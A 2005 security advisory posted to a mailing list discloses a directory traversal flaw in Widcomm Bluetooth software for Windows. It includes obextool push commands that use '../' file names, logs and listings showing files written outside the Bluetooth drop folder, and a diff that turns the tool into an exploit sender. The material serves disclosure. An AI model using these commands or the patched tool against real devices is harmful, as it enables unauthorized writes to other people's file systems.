<<< Date Index >>>     <<< Thread Index >>>

'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal'



Typos included at no charge.  =]
DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory 
Transversal'
Author: Kevin Finisterre
Vendor: http://66.45.42.84/Products, 
http://www.broadcom.com/press/release.php?id=525262
Product: 'versions older than BTW 3.0.1.905 ?'
References: http://www.digitalmunition.com/DMA[2005-0412a].txt

Description: 
On August 11 2004 in Advisory Reference ptl-2004-03 Pentest Limited released 
very minimal 
detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. 
CAN-2004-0775
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775 was created in 
order to 
provide information surrounding this issue. Unfortunately none of the links 
provided by the
CVE entry contain any real data on the attacks. In efforts to document and 
exploit the 
above mentioned issues I stumbled upon yet an other problem. 

WIDCOMM Inc. which is short for Wireless Internet and Data/Voice Communications 
previously designed
products for indoor wireless communications. Founded in June 1998, the company 
was focused on 
Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and 
inexpensive for people with 
PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to 
access the Internet. 

One May 10 2004 Broadcom Corporation, a leading provider of highly integrated 
semiconductor 
solutions enabling broadband communications, announced that had completed the 
acquisition of WIDCOMM.

I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, 
D-link and Zoom and only 
one of them came with BlueSoleil instead of Widcomm based software. I would 
guess that somewhere 
around 90% of the PC Bluetooth hardware on the market currently comes with 
Widcomm install media. 

The dongle that I used for testing was an Ambicom BT2000C-US on windows XP SP2. 
The software that 
was bundled with the dongle was a variant of Widcomm's Bluetooth Software 
version 1.4.2. Several 
other revisions are available however due to problems with licensing you may 
find it difficult to 
make use of anything that did not specifically come packaged with your device. 
I even ran into an 
instance in which my purchased dongle did not even work with the software it 
was bundled with 
(Thanks D-Link!). 

Several sites document the difficulties that the end user is faced with when 
trying to use the various
versions of the Widcomm software. Short of stating that Widcomm and Broadcomm 
have really done a huge 
disservice to their end users, I will not go into the fiasco surrounding 
license.dat issues. Fixing 
and or patching the vulnerabilities I am going to mention may be compounded by 
the fact that Widcomm
and Broadcomm's customer base is simply unable to upgrade. Widcomm has in 
essence shot us all in the 
foot.  

After an install of the Widcomm software you are presented with the 'Initial 
Bluetooth Configuration'
screen. Here you choose the name of your device and select the bluetooth 
services it will provide. 
By default 'PIM Item Transfer' is set to start automatically with no 
authentication required. Under
normal circumstances files are dropped into "<My Documents>\Bluetooth Exchange 
Folder". Any device 
that attempts to transfer files to or from your device should be limited to 
accessing this folder. 

Unfortunately this is NOT the case, a simple ../ is enough to cause a little 
trouble. This attack can
have its limitations depending on how the software settings are configured. 
Using a modified obextool 
binary from ussp-push we can easily demonstrate the problem. 

As stated above a normal transaction should limit files to the "<My 
Documents>\Bluetooth Exchange Folder"

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE 
testfile 3
Sending object ...

BtserverSpylite output: 
00:32:17.995 OPP:  Settings for saving objects...
00:32:18.015       vCard's: 'Save to PIM'
00:32:18.035       vCal's:  'Do not accept'
00:32:18.055       vMsg's:  'Do not accept'
00:32:18.075       vNote's: 'Do not accept'
00:32:18.095       Other:   'Save to Inbox folder'
00:32:18.115       Folder:  'C:\Documents and Settings\Administrator\My 
Documents\Bluetooth Exchange Folder\'
00:32:18.135 OPP:  File did not contain an object.  Save to Inbox as 'other' 
type.
00:32:18.155 OPP:  'testfile' saved to PIM Item Transfer Folder '...My 
Documents\Bluetooth Exchange Folder'


C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange 
Folder>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth 
Exchange Folder

07/12/2005  12:32 AM    <DIR>          .
07/12/2005  12:32 AM    <DIR>          ..
07/12/2005  12:32 AM               262 testfile
               1 File(s)            262 bytes
               2 Dir(s)  35,701,919,744 bytes free

We are however able to travel beyond the Bluetooth Exchange Folder by adding 
"../" to our request. Under the 
default configuration this allows us to write to the root of the My Documents 
folder. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE 
../Im_rick_james 3
Sending object ...

00:35:19.897 OPP:  '../Im_rick_james' saved to PIM Item Transfer Folder '...\My 
Documents\Bluetooth Exchange Folder'

C:\Documents and Settings\Administrator\My Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents

07/12/2005  12:35 AM    <DIR>          .
07/12/2005  12:35 AM    <DIR>          ..
07/12/2005  12:35 AM               262 Im_rick_james
07/01/2005  08:38 PM    <DIR>          Bluetooth
07/12/2005  12:32 AM    <DIR>          Bluetooth Exchange Folder
07/01/2005  04:38 PM    <DIR>          My Music
06/25/2005  02:55 PM    <DIR>          My Pictures
06/27/2005  12:08 AM    <DIR>          My Virtual Machines
               1 File(s)            262 bytes
               7 Dir(s)  35,701,919,744 bytes free

Due to an unknown reason, when using the default configuration you are only 
able to go up one 
directory. Because of this you are limited to being able to write to the My 
Documents folder ONLY. 
his could be an XP SP2 thing. I have NOT tested this on windows 9x based 
software at all. In other
words your results may vary. 

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE 
../../beiotch 3            
Sending object ...
00:37:25.457 OPP:  Error - Could not rename 
'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 
'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange 
Folder\../../beiotch'

If you change the default drop directory from "<My Documents>\Bluetooth 
Exchange Folder" to something
else we are able to traverse a good portion of the file system. In this example 
we used 
C:\test\test2\test3\test4 as our bluetooth drop folder. 

00:57:38.471 OPP:  Settings for saving objects...
00:57:38.481       vCard's: 'Save to PIM'
00:57:38.501       vCal's:  'Do not accept'
00:57:38.511       vMsg's:  'Do not accept'
00:57:38.532       vNote's: 'Do not accept'
00:57:38.542       Other:   'Save to Inbox folder'
00:57:38.562       Folder:  'C:\test\test2\test3\test4'
00:57:38.582 OPP:  File did not contain an object.  Save to Inbox as 'other' 
type.
00:57:38.602 OPP:  '../blah' saved to PIM Item Transfer Folder 
'C:\test\test2\test3\test4'

00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46)
00:57:57.599 OPP:  Settings for saving objects...
00:57:57.609       vCard's: 'Save to PIM'
00:57:57.629       vCal's:  'Do not accept'
00:57:57.649       vMsg's:  'Do not accept'
00:57:57.669       vNote's: 'Do not accept'
00:57:57.679       Other:   'Save to Inbox folder'
00:57:57.699       Folder:  'C:\test\test2\test3\test4'
00:57:57.719 OPP:  File did not contain an object.  Save to Inbox as 'other' 
type.
00:57:57.739 OPP:  '../../blah' saved to PIM Item Transfer Folder 
'C:\test\test2\test3\test4'

00:58:14.243 OPP:  Settings for saving objects...
00:58:14.263       vCard's: 'Save to PIM'
00:58:14.283       vCal's:  'Do not accept'
00:58:14.293       vMsg's:  'Do not accept'
00:58:14.313       vNote's: 'Do not accept'
00:58:14.333       Other:   'Save to Inbox folder'
00:58:14.343       Folder:  'C:\test\test2\test3\test4'
00:58:14.363 OPP:  File did not contain an object.  Save to Inbox as 'other' 
type.
00:58:14.383 OPP:  '../../../blah' saved to PIM Item Transfer Folder 
'C:\test\test2\test3\test4'

Again for some reason we run into a minor limitation on where the files can be 
dropped. 

00:58:29.735 OPP:  Settings for saving objects...
00:58:29.755       vCard's: 'Save to PIM'
00:58:29.775       vCal's:  'Do not accept'
00:58:29.795       vMsg's:  'Do not accept'
00:58:29.815       vNote's: 'Do not accept'
00:58:29.835       Other:   'Save to Inbox folder'
00:58:29.855       Folder:  'C:\test\test2\test3\test4'
00:58:29.875 OPP:  File did not contain an object.  Save to Inbox as 'other' 
type.
00:58:29.895 OPP:  Error - Could not rename 
'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 
'C:\test\test2\test3\test4\../../../../blah'

As you can see the bluetooth drop directory can easily be ignored by the 
attacker. 

C:\>dir test\blah test\test2\blah test\test2\test3\blah 

 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\test

07/12/2005  12:58 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2\test3

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes


I have not seen this issue documented anywhere. It was not described in the 
release by pentest.co.uk, 
nor was it mentioned in any advisory from Widcomm or Broadcomm. I am unable to 
tell exactly when this 
issue was introduced into the Widcomm codebase and I am equally unable to tell 
exactly when it was 
fixed. All of the above testing was performed against PC versions of the 
software, it is currently 
unknown how other Widcomm platforms are affected by this issue. 

I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for 
this condition). In 
these versions the "../" request is replaced with "..x" thus preventing the 
attack. 

Timeline associated with this bug:
04/12/2005 Public disclosure due to the fact that the bug was silently fixed by 
the vendor(s) in the past.

Regurgitated Workaround:
'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth 
software'. Alternately
users can 'set their Bluetooth device configuration to be non-discoverable or 
hidden.'. Please note 
however 'This will not stop the device from being vulnerable but it may limit 
the exposure.' 

Due to the fact that this issue was patched silently NO attempt was made to 
notify Broadcomm or Widcomm 
about this issue. The issue appears to have been patched in version 3.x. 
Unfortunately due to licensing 
issues users of this software will find it difficult to patch this 
vulnerability, and I found it difficult
to research which versions were and were not vulnerable. Bug your vendor to get 
you some updated software 
and ask them to quit playing games over license.dat files! 

Other vendors are affected by similar issues and future advisories will be 
released. 

All your Bluetooth are belong to greenplaque. 

-KF


@@ -305,20 +305,21 @@

 void cmd_push(bdaddr_t *local, int argc, char **argv)
 {
-       char *filename;
+       char *filename, *malfile;
        char *alias;
        bdaddr_t bdaddr;
        uint8_t channel;
-
+
        if (argc < 3) {
                usage();
                return;
        }

        filename = argv[1];
-       alias = basename(filename);
        str2ba(argv[2], &bdaddr);
-       channel = (argc > 3) ? atoi(argv[3]) : 10;
+       malfile = argv[3];
+       alias = malfile;
+       channel = (argc > 4) ? atoi(argv[4]) : 3;

        btobex_push(&bdaddr, channel, filename, alias);
 }
@@ -330,7 +331,7 @@
        char *opt;
        char *doc;
 } command[] = {
-       { "push", cmd_push, "<file> <bdaddr> [channel]", "Push a file" },
+       { "push", cmd_push, "<file> <bdaddr> <malfile> [channel] ", "Push a 
file" },
        { NULL, NULL, 0, 0 }
 };